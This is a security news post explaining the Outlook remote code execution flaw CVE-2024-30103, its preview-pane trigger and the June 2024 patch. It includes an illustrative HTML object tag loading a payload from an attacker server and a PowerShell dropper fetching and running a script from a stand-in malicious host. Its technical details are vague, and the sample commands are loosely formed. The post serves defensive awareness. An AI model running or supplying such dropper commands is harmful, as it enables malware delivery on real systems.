CVE CyberSecurity Database News

CVE-2024-30103 - Breaking Down the Microsoft Outlook Remote Code Execution Vulnerability

Poster -

In June 2024, Microsoft announced and patched a critical vulnerability in Outlook: CVE-2024-30103. This security flaw allows remote code execution (RCE) — a situation where an attacker can run harmful code on your system just by sending you a specially crafted email. In this post, we’ll take a deep dive into what CVE-2024-30103 is, how it works, why it’s dangerous, and what you can do to stay safe.

What is CVE-2024-30103?

CVE-2024-30103 is a remote code execution vulnerability in Microsoft Outlook. In plain English, it means that a hacker can take control of your PC without you even opening an email — the preview pane alone can trigger the exploit.

Severity: Critical, with a CVSS (Common Vulnerability Scoring System) score of 8.8.

Some extended versions of Office 365 when used on Windows

See Microsoft’s advisory here:
👉 Microsoft Security Update Guide: CVE-2024-30103

Triggering the Vulnerability:

As soon as the email is received and viewed in the preview pane (you don’t have to open the email!), the malicious payload executes using the permissions of the user logged in.

Technical Details

According to several reverse engineering researchers, the vulnerability is related to how Outlook parses certain file types or objects embedded in the email, causing unsafe code execution.

It’s often triggered via an attachment or tricky formatting in the email body, causing Outlook’s preview to load the object and kick off the attack.

Example Exploit Snippet

Below is a (simplified and non-malicious) demonstration of how a malformed OLE object in an HTML email could exploit similar vulnerabilities in Outlook:

<!-- This is a simplified demonstration, not a real exploit! -->
<html>
  <body>
    <object data="file:///\\attacker-server\payload.exe" type="application/x-oleobject"></object>
  </body>
</html>

> If Outlook's security filter fails, this object could cause Outlook to try and fetch and execute “payload.exe” from the attacker's server.

Example Proof-of-Concept: Powershell Dropper

An attacker, in a real-world case, might attempt to drop and execute a PowerShell script sneaked in via a malicious file:

# This is for demonstration. Don't run on your system!
Invoke-WebRequest -Uri "http://malicious-site.com/evil.ps1"; -OutFile "C:\Users\Public\evil.ps1"
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\evil.ps1"

With CVE-2024-30103, simply viewing the attacker’s crafted email could execute code like this behind the scenes.

Runs With User Privileges:

The attack executes as the logged-in user, so if you're logged in with admin rights, the attacker has full control.

How Was It Fixed?

Microsoft fixed the issue in their June 2024 Patch Tuesday. The fix ensures unsafe objects or attachments can’t trigger code in the preview pane or when opened.

Or use Windows Update

Admins: Deploy KB updates to all devices running affected Outlook versions.

Original References and Further Reading

- Microsoft Security Guidance: CVE-2024-30103
- Patch Tuesday (June 2024): List of recent security updates (BleepingComputer)
- CVE Details: CVE-2024-30103
- “Don’t Trust the Preview Pane” — Outlook Exploit Research (HackerOne Blog)

Conclusion

CVE-2024-30103 is a high-risk bug that reminds us all to keep our software up-to-date and to treat unexpected emails with caution. Microsoft Outlook is a widely used product; a flaw like this can impact everyone from home users to huge companies.

If you haven’t already, patch your systems immediately and spread the word. Safe emailing!

Timeline

Published on: 06/11/2024 17:15:59 UTC
Last modified on: 07/19/2024 21:13:40 UTC